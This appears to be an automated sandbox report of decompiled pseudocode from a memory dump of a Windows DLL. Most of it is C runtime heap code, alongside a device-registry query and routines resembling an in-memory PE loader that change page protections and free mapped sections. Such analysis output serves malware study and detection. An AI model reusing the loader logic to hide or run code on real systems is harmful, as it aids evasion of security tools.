                                                                                                                                                      				 *((intOrPtr*)(0x178)) =  *((intOrPtr*)(0x178)) + __edx;
                                                                                                                                                      				_t14 = _t38;
                                                                                                                                                      				 *_t14 =  *_t14 + __edx;
                                                                                                                                                      				 *_t14 =  *_t14 + __edx;
                                                                                                                                                      				_push(es);
                                                                                                                                                      				 *_t14 =  *_t14 + __edx;
                                                                                                                                                      				asm("repne rol byte [eax], 0x10");
                                                                                                                                                      				asm("adc eax, ebp");
                                                                                                                                                      				 *_t14 =  *_t14 + __edx;
                                                                                                                                                      				asm("adc [ebx-0x40], ah");
                                                                                                                                                      				 *_t14 =  *_t14 + __edx;
                                                                                                                                                      				asm("adc [edx+0xc], ch");
                                                                                                                                                      				_push(0xc);
                                                                                                                                                      				_push(0x103301c0);
                                                                                                                                                      				_t15 = E10010534(__eax, __edi, 0xffffffffc29f1178);
                                                                                                                                                      				_t36 =  *0x00000180;
                                                                                                                                                      				if(_t36 != 0) {
                                                                                                                                                      					if( *0x10335f3c != 3) {
                                                                                                                                                      						_push(_t36);
                                                                                                                                                      						goto L8;
                                                                                                                                                      					} else {
                                                                                                                                                      						L1000FA03(4);
                                                                                                                                                      						 *0x00000174 =  *0x00000174 & 0x00000000;
                                                                                                                                                      						_t20 = E1000FA7C(_t36);
                                                                                                                                                      						 *0x0000015C = _t20;
                                                                                                                                                      						if(_t20 != 0) {
                                                                                                                                                      							_push(_t36);
                                                                                                                                                      							_push(_t20);
                                                                                                                                                      							E1000FAA7();
                                                                                                                                                      						}
                                                                                                                                                      						 *0x00000174 = 0xfffffffe;
                                                                                                                                                      						_t15 = E1000CA86();
                                                                                                                                                      						if( *((intOrPtr*)(0x15c)) == 0) {
                                                                                                                                                      							_push( *((intOrPtr*)(0x180)));
                                                                                                                                                      							L8:
                                                                                                                                                      							_push(0);
                                                                                                                                                      							_t15 = RtlFreeHeap( *0x10333310); // executed
                                                                                                                                                      							_t47 = _t15;
                                                                                                                                                      							if(_t15 == 0) {
                                                                                                                                                      								_t17 = E1000F720(_t47);
                                                                                                                                                      								 *_t17 = E1000F6E5(GetLastError());
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return E10010579(_t15);
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                      • ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                      • ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2661975262-0
                                                                                                                                                      • Opcode ID: c35be7ddd376820428f790f1a01076792734619c7c1b30ac8a6f5b23f6ddbc2b
                                                                                                                                                      • Instruction ID: f3614e2ed5c3b7a2523f888baaf654e085a5ac9fd5a4e10f0babc6e667b4755f
                                                                                                                                                      • Opcode Fuzzy Hash: c35be7ddd376820428f790f1a01076792734619c7c1b30ac8a6f5b23f6ddbc2b
                                                                                                                                                      • Instruction Fuzzy Hash: D921F17AA0E3C55FEB02CB705C957597F609F07295F0A009AE0849B1E7DB689C448BA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                      			E10019780(void* __ebx, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a36, intOrPtr* _a40, intOrPtr* _a44) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				char _v12;
                                                                                                                                                      				void* _t45;
                                                                                                                                                      
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12, 0, 0, _a44); // executed
                                                                                                                                                      				if(GetLastError() == 0x7a) {
                                                                                                                                                      					 *_a40 = L1000CE56(__ebx, _a44, _t45, __esi,  *_a44);
                                                                                                                                                      					E1000CF20(_t45,  *_a40, 0,  *_a44);
                                                                                                                                                      					__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12,  *_a40,  *_a44, 0); // executed
                                                                                                                                                      					_v8 = 1;
                                                                                                                                                      				}
                                                                                                                                                      				return _v8;
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 100197AC
                                                                                                                                                      • GetLastError.KERNEL32 ref: 100197B2
                                                                                                                                                      • _memset.LIBCMT ref: 100197DE
                                                                                                                                                      • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019804
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DevicePropertyRegistrySetup$ErrorLast_memset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 895502402-0
                                                                                                                                                      • Opcode ID: 6adbbad0e525441aa34f394d1e709c810f69e4a50dd3602c5c2cb0cc2a6a471c
                                                                                                                                                      • Instruction ID: f8922b701b9361cc18bff0ab125b4374f9cfd65e033693ba824ef8b8be46b605
                                                                                                                                                      • Opcode Fuzzy Hash: 6adbbad0e525441aa34f394d1e709c810f69e4a50dd3602c5c2cb0cc2a6a471c
                                                                                                                                                      • Instruction Fuzzy Hash: 8C1193B9610208BBDB04DF98D895FDA77B9AB49304F108259F9099B284D631EA85CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 27%
                                                                                                                                                      			E1000CA30(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                      				intOrPtr* _t10;
                                                                                                                                                      				intOrPtr _t13;
                                                                                                                                                      				intOrPtr _t23;
                                                                                                                                                      				void* _t25;
                                                                                                                                                      
                                                                                                                                                      				_push(0xc);
                                                                                                                                                      				_push(0x103301c0);
                                                                                                                                                      				_t8 = E10010534(__ebx, __edi, __esi);
                                                                                                                                                      				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                                                                                      				if(_t23 == 0) {
                                                                                                                                                      					L9:
                                                                                                                                                      					return E10010579(_t8);
                                                                                                                                                      				}
                                                                                                                                                      				if( *0x10335f3c != 3) {
                                                                                                                                                      					_push(_t23);
                                                                                                                                                      					L7:
                                                                                                                                                      					_push(0);
                                                                                                                                                      					_t8 = RtlFreeHeap( *0x10333310); // executed
                                                                                                                                                      					_t31 = _t8;
                                                                                                                                                      					if(_t8 == 0) {
                                                                                                                                                      						_t10 = E1000F720(_t31);
                                                                                                                                                      						 *_t10 = E1000F6E5(GetLastError());
                                                                                                                                                      					}
                                                                                                                                                      					goto L9;
                                                                                                                                                      				}
                                                                                                                                                      				L1000FA03(4);
                                                                                                                                                      				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                                                                      				_t13 = E1000FA7C(_t23);
                                                                                                                                                      				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                                                                                      				if(_t13 != 0) {
                                                                                                                                                      					_push(_t23);
                                                                                                                                                      					_push(_t13);
                                                                                                                                                      					E1000FAA7();
                                                                                                                                                      				}
                                                                                                                                                      				 *(_t25 - 4) = 0xfffffffe;
                                                                                                                                                      				_t8 = E1000CA86();
                                                                                                                                                      				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                                                                                      					goto L9;
                                                                                                                                                      				} else {
                                                                                                                                                      					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                                                                                      					goto L7;
                                                                                                                                                      				}
                                                                                                                                                      			}








                                                                                                                                                      APIs
                                                                                                                                                      • ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                      • ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2661975262-0
                                                                                                                                                      • Opcode ID: d759168b4be4b4469117ee5877101e11671dc200a8624a95c389703c63f9e0ca
                                                                                                                                                      • Instruction ID: 10b30a0b1b21ab9b25203a3b4f1cd3614836a259c78c12a13bfb3de2cf880016
                                                                                                                                                      • Opcode Fuzzy Hash: d759168b4be4b4469117ee5877101e11671dc200a8624a95c389703c63f9e0ca
                                                                                                                                                      • Instruction Fuzzy Hash: 94016775B0131A9AFB10DBB49C46B5E76A4DF013E5F104109F5049A0D5CF38A940DF56
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 73%
                                                                                                                                                      			E1000CE64(void* __edx) {
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				intOrPtr _t1;
                                                                                                                                                      				void* _t2;
                                                                                                                                                      				void* _t6;
                                                                                                                                                      				void* _t10;
                                                                                                                                                      				void* _t12;
                                                                                                                                                      				void* _t18;
                                                                                                                                                      				void* _t20;
                                                                                                                                                      				void* _t22;
                                                                                                                                                      				intOrPtr _t24;
                                                                                                                                                      				void* _t28;
                                                                                                                                                      				void* _t30;
                                                                                                                                                      				void* _t32;
                                                                                                                                                      
                                                                                                                                                      				_t18 = __edx;
                                                                                                                                                      				_t12 = HeapAlloc;
                                                                                                                                                      				do {
                                                                                                                                                      					_t32 =  *0x10333310; // 0x2380000
                                                                                                                                                      					_t20 = _t30;
                                                                                                                                                      					if(_t32 == 0) {
                                                                                                                                                      						E100119E6(_t12, _t18, _t20, _t32);
                                                                                                                                                      						E10011846(0x1e);
                                                                                                                                                      						E100115A8(0xff);
                                                                                                                                                      					}
                                                                                                                                                      					_t1 =  *0x10335f3c; // 0x1
                                                                                                                                                      					if(_t1 != 1) {
                                                                                                                                                      						__eflags = _t1 - 3;
                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                      							L10:
                                                                                                                                                      							__eflags = _t30;
                                                                                                                                                      							if(_t30 == 0) {
                                                                                                                                                      								_t20 = 1;
                                                                                                                                                      								__eflags = 1;
                                                                                                                                                      							}
                                                                                                                                                      							_t22 = _t20 + 0x0000000f & 0xfffffff0;
                                                                                                                                                      							__eflags = _t22;
                                                                                                                                                      							_push(_t22);
                                                                                                                                                      							goto L13;
                                                                                                                                                      						} else {
                                                                                                                                                      							_push(_t30);
                                                                                                                                                      							_t2 = E1000CE07(_t12, _t20, 0, __eflags);
                                                                                                                                                      							__eflags = _t2;
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								goto L10;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                      							_t10 = 1;
                                                                                                                                                      							__eflags = 1;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t10 = _t30;
                                                                                                                                                      						}
                                                                                                                                                      						_push(_t10);
                                                                                                                                                      						L13:
                                                                                                                                                      						_push(0);
                                                                                                                                                      						_t2 = RtlAllocateHeap( *0x10333310); // executed
                                                                                                                                                      					}
                                                                                                                                                      					_t28 = _t2;
                                                                                                                                                      					if(_t28 == 0) {
                                                                                                                                                      						_t24 = 0xc;
                                                                                                                                                      						if( *0x103337d4 == _t2) {
                                                                                                                                                      							 *((intOrPtr*)(E1000F720(__eflags))) = _t24;
                                                                                                                                                      							L19:
                                                                                                                                                      							 *((intOrPtr*)(E1000F720(_t37))) = _t24;
                                                                                                                                                      						} else {
                                                                                                                                                      							goto L16;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					return _t28;
                                                                                                                                                      					L16:
                                                                                                                                                      					_t6 = E100108CA(_t30);
                                                                                                                                                      					_t37 = _t6;
                                                                                                                                                      				} while (_t6 != 0);
                                                                                                                                                      				goto L19;
                                                                                                                                                      			}


















                                                                                                                                                      0x1000cea5
                                                                                                                                                      0x1000cea5
                                                                                                                                                      0x1000ce9f
                                                                                                                                                      0x1000ce9f
                                                                                                                                                      0x1000ce9f
                                                                                                                                                      0x1000cea6
                                                                                                                                                      0x1000cec7
                                                                                                                                                      0x1000cec7
                                                                                                                                                      0x1000cece
                                                                                                                                                      0x1000cece
                                                                                                                                                      0x1000ced0
                                                                                                                                                      0x1000ced4
                                                                                                                                                      0x1000cede
                                                                                                                                                      0x1000cedf
                                                                                                                                                      0x1000cef3
                                                                                                                                                      0x1000cef5
                                                                                                                                                      0x1000cefa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000cedf
                                                                                                                                                      0x1000cf02
                                                                                                                                                      0x1000cee1
                                                                                                                                                      0x1000cee2
                                                                                                                                                      0x1000cee7
                                                                                                                                                      0x1000cee9
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • __FF_MSGBANNER.LIBCMT ref: 1000CE79
                                                                                                                                                        • Part of subcall function 100119E6: __NMSG_WRITE.LIBCMT ref: 10011A0D
                                                                                                                                                        • Part of subcall function 100119E6: __NMSG_WRITE.LIBCMT ref: 10011A17
                                                                                                                                                      • __NMSG_WRITE.LIBCMT ref: 1000CE80
                                                                                                                                                        • Part of subcall function 10011846: _strcpy_s.LIBCMT ref: 100118B2
                                                                                                                                                        • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 100118C3
                                                                                                                                                        • Part of subcall function 10011846: GetModuleFileNameA.KERNEL32(00000000,103334D9,00000104,?,103332E0,00000000), ref: 100118DF
                                                                                                                                                        • Part of subcall function 10011846: _strcpy_s.LIBCMT ref: 100118F4
                                                                                                                                                        • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 10011907
                                                                                                                                                        • Part of subcall function 10011846: _strlen.LIBCMT ref: 10011910
                                                                                                                                                        • Part of subcall function 10011846: _strlen.LIBCMT ref: 1001191D
                                                                                                                                                        • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 1001194A
                                                                                                                                                        • Part of subcall function 100115A8: ___crtCorExitProcess.LIBCMT ref: 100115AC
                                                                                                                                                        • Part of subcall function 100115A8: ExitProcess.KERNEL32 ref: 100115B6
                                                                                                                                                        • Part of subcall function 1000CE07: ___sbh_alloc_block.LIBCMT ref: 1000CE2F
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 1000CECE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __invoke_watson$ExitProcess_strcpy_s_strlen$AllocateFileHeapModuleName___crt___sbh_alloc_block
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3791426274-0
                                                                                                                                                      • Opcode ID: ac007278a4e0de9d752827624b5274de92f56d31190f61e6d2d2646ba59319ec
                                                                                                                                                      • Instruction ID: 6f1a83c6d6f502121b77b2a43b6d62c081e19aaa5c93b61cf19e771af3aa1e29
                                                                                                                                                      • Opcode Fuzzy Hash: ac007278a4e0de9d752827624b5274de92f56d31190f61e6d2d2646ba59319ec
                                                                                                                                                      • Instruction Fuzzy Hash: 5401F936B493EE9AF221D765DCC1D6E72CDDBC16F0F220126F948CA59ACB60DC8142E1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                      			E1001B1C0(intOrPtr* _a4, void** _a8) {
                                                                                                                                                      				long _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				signed int _v16;
                                                                                                                                                      				signed int _v20;
                                                                                                                                                      				signed int _v24;
                                                                                                                                                      				int _t67;
                                                                                                                                                      
                                                                                                                                                      				if(_a8[2] != 0) {
                                                                                                                                                      					_t4 =  &(_a8[3]); // 0x1
                                                                                                                                                      					if(( *_t4 & 0x02000000) == 0) {
                                                                                                                                                      						_t31 =  &(_a8[3]); // 0x1
                                                                                                                                                      						asm("sbb edx, edx");
                                                                                                                                                      						_v16 =  ~( ~( *_t31 & 0x20000000));
                                                                                                                                                      						_t34 =  &(_a8[3]); // 0x1
                                                                                                                                                      						asm("sbb ecx, ecx");
                                                                                                                                                      						_v24 =  ~( ~( *_t34 & 0x40000000));
                                                                                                                                                      						_t37 =  &(_a8[3]); // 0x1
                                                                                                                                                      						asm("sbb eax, eax");
                                                                                                                                                      						_v12 =  ~( ~( *_t37 & 0x80000000));
                                                                                                                                                      						_t42 = _v24 * 8; // 0x2034e6cd
                                                                                                                                                      						_v20 =  *((intOrPtr*)((_v16 << 4) + _t42 + 0x103330c4 + _v12 * 4));
                                                                                                                                                      						_t49 =  &(_a8[3]); // 0x1
                                                                                                                                                      						if(( *_t49 & 0x04000000) != 0) {
                                                                                                                                                      							_v20 = _v20 | 0x00000200;
                                                                                                                                                      						}
                                                                                                                                                      						_t55 =  &(_a8[2]); // 0xb805ebc0
                                                                                                                                                      						_t67 = VirtualProtect( *_a8,  *_t55, _v20,  &_v8); // executed
                                                                                                                                                      						if(_t67 != 0) {
                                                                                                                                                      							return 1;
                                                                                                                                                      						} else {
                                                                                                                                                      							_push("Error protecting memory page");
                                                                                                                                                      							E1001AE60(_t67);
                                                                                                                                                      							return 0;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					_t7 =  &(_a8[1]); // 0x330475c0
                                                                                                                                                      					if( *_a8 !=  *_t7) {
                                                                                                                                                      						L8:
                                                                                                                                                      						return 1;
                                                                                                                                                      					}
                                                                                                                                                      					if(_a8[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x3c)) {
                                                                                                                                                      						L7:
                                                                                                                                                      						_t26 =  &(_a8[2]); // 0xb805ebc0
                                                                                                                                                      						 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))( *_a8,  *_t26, 0x4000,  *((intOrPtr*)(_a4 + 0x34))); // executed
                                                                                                                                                      						goto L8;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t16 =  &(_a8[2]); // 0xb805ebc0
                                                                                                                                                      						if( *_t16 %  *(_a4 + 0x3c) != 0) {
                                                                                                                                                      							goto L8;
                                                                                                                                                      						}
                                                                                                                                                      						goto L7;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return 1;
                                                                                                                                                      			}










                                                                                                                                                      Strings
                                                                                                                                                      • Error protecting memory page, xrefs: 1001B2DD
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Error protecting memory page
                                                                                                                                                      • API String ID: 0-1748499907
                                                                                                                                                      • Opcode ID: fa3f9b01b46355d1ec19b93347b7561b613cc618b83ed61fa7cf9da906a09f9b
                                                                                                                                                      • Instruction ID: 8d650c0da19698877930e2c5171e1c21c57976ae84b1b649a9511697b3bf2f19
                                                                                                                                                      • Opcode Fuzzy Hash: fa3f9b01b46355d1ec19b93347b7561b613cc618b83ed61fa7cf9da906a09f9b
                                                                                                                                                      • Instruction Fuzzy Hash: EB41D774A005099FD748DF58C490BA9B3B2FB88310F14C259EC1A8F355C731EE85CB80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1000F7BF(intOrPtr _a4) {
                                                                                                                                                      				void* _t6;
                                                                                                                                                      				intOrPtr _t7;
                                                                                                                                                      				void* _t10;
                                                                                                                                                      
                                                                                                                                                      				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                                                      				 *0x10333310 = _t6;
                                                                                                                                                      				if(_t6 != 0) {
                                                                                                                                                      					_t7 = E1000F764(__eflags);
                                                                                                                                                      					__eflags = _t7 - 3;
                                                                                                                                                      					 *0x10335f3c = _t7;
                                                                                                                                                      					if(_t7 != 3) {
                                                                                                                                                      						L5:
                                                                                                                                                      						__eflags = 1;
                                                                                                                                                      						return 1;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t10 = E1000FA34(0x3f8);
                                                                                                                                                      						__eflags = _t10;
                                                                                                                                                      						if(_t10 != 0) {
                                                                                                                                                      							goto L5;
                                                                                                                                                      						} else {
                                                                                                                                                      							HeapDestroy( *0x10333310);
                                                                                                                                                      							 *0x10333310 =  *0x10333310 & 0x00000000;
                                                                                                                                                      							goto L1;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					L1:
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • HeapCreate.KERNEL32(00000000,00001000,00000000,1000E9AF,00000001), ref: 1000F7D0
                                                                                                                                                      • HeapDestroy.KERNEL32 ref: 1000F806
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$CreateDestroy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3296620671-0
                                                                                                                                                      • Opcode ID: bb46bfd717c190190485aefa14a3cf7dcb62553dd6b93138db4473b6de64172e
                                                                                                                                                      • Instruction ID: 42b5b4e525c6d5e648315bcb041ba63a368b68b04be7829f407a1d363953a1d4
                                                                                                                                                      • Opcode Fuzzy Hash: bb46bfd717c190190485aefa14a3cf7dcb62553dd6b93138db4473b6de64172e
                                                                                                                                                      • Instruction Fuzzy Hash: 6FE06D74A14352AAF700EB318C897A936ECFB807D6F20C83DF408C84AAFF648501AA01
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                                      			E1001A960(void* _a4) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				signed int _v16;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				void* _t49;
                                                                                                                                                      				void* _t52;
                                                                                                                                                      				intOrPtr _t60;
                                                                                                                                                      				void* _t68;
                                                                                                                                                      				void* _t70;
                                                                                                                                                      				signed int _t76;
                                                                                                                                                      				signed int _t87;
                                                                                                                                                      				signed int _t93;
                                                                                                                                                      				void* _t94;
                                                                                                                                                      				void* _t95;
                                                                                                                                                      				void* _t96;
                                                                                                                                                      				void* _t97;
                                                                                                                                                      
                                                                                                                                                      				_t49 = _a4;
                                                                                                                                                      				_v8 = _t49;
                                                                                                                                                      				if(_v8 != 0) {
                                                                                                                                                      					__eflags =  *(_v8 + 0x10);
                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                      						_t9 =  *_v8 + 0x28; // 0x1ab2068
                                                                                                                                                      						_t93 =  *((intOrPtr*)(_v8 + 4)) +  *_t9;
                                                                                                                                                      						__eflags = _t93;
                                                                                                                                                      						_v12 = _t93;
                                                                                                                                                      						_v12( *((intOrPtr*)(_v8 + 4)), 0, 0);
                                                                                                                                                      					}
                                                                                                                                                      					_push( *((intOrPtr*)(_v8 + 0x30)));
                                                                                                                                                      					E1000CA30(_t68, _t94, _t95, __eflags);
                                                                                                                                                      					_t97 = _t96 + 4;
                                                                                                                                                      					_t70 = _v8;
                                                                                                                                                      					__eflags =  *(_t70 + 8);
                                                                                                                                                      					if( *(_t70 + 8) == 0) {
                                                                                                                                                      						L12:
                                                                                                                                                      						_t52 = _v8;
                                                                                                                                                      						__eflags =  *(_t52 + 4);
                                                                                                                                                      						if( *(_t52 + 4) != 0) {
                                                                                                                                                      							 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x20))))( *((intOrPtr*)(_v8 + 4)), 0, 0x8000,  *((intOrPtr*)(_v8 + 0x34))); // executed
                                                                                                                                                      						}
                                                                                                                                                      						return HeapFree(GetProcessHeap(), 0, _v8);
                                                                                                                                                      					} else {
                                                                                                                                                      						_v16 = 0;
                                                                                                                                                      						while(1) {
                                                                                                                                                      							__eflags = _v16 -  *((intOrPtr*)(_v8 + 0xc));
                                                                                                                                                      							if(__eflags >= 0) {
                                                                                                                                                      								break;
                                                                                                                                                      							}
                                                                                                                                                      							_t60 =  *((intOrPtr*)(_v8 + 8));
                                                                                                                                                      							_t76 = _v16;
                                                                                                                                                      							__eflags =  *(_t60 + _t76 * 4);
                                                                                                                                                      							if( *(_t60 + _t76 * 4) != 0) {
                                                                                                                                                      								 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c))))( *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + _v16 * 4)),  *((intOrPtr*)(_v8 + 0x34))); // executed
                                                                                                                                                      								_t97 = _t97 + 8;
                                                                                                                                                      							}
                                                                                                                                                      							_t87 = _v16 + 1;
                                                                                                                                                      							__eflags = _t87;
                                                                                                                                                      							_v16 = _t87;
                                                                                                                                                      						}
                                                                                                                                                      						_push( *((intOrPtr*)(_v8 + 8)));
                                                                                                                                                      						E1000CA30(_t68, _t94, _t95, __eflags);
                                                                                                                                                      						_t97 = _t97 + 4;
                                                                                                                                                      						goto L12;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t49;
                                                                                                                                                      			}



















                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001a9d7
                                                                                                                                                      0x1001a9da
                                                                                                                                                      0x1001a9dd
                                                                                                                                                      0x1001a9e1
                                                                                                                                                      0x1001a9fd
                                                                                                                                                      0x1001a9ff
                                                                                                                                                      0x1001a9ff
                                                                                                                                                      0x1001a9c3
                                                                                                                                                      0x1001a9c3
                                                                                                                                                      0x1001a9c6
                                                                                                                                                      0x1001a9c6
                                                                                                                                                      0x1001aa0a
                                                                                                                                                      0x1001aa0b
                                                                                                                                                      0x1001aa10
                                                                                                                                                      0x00000000
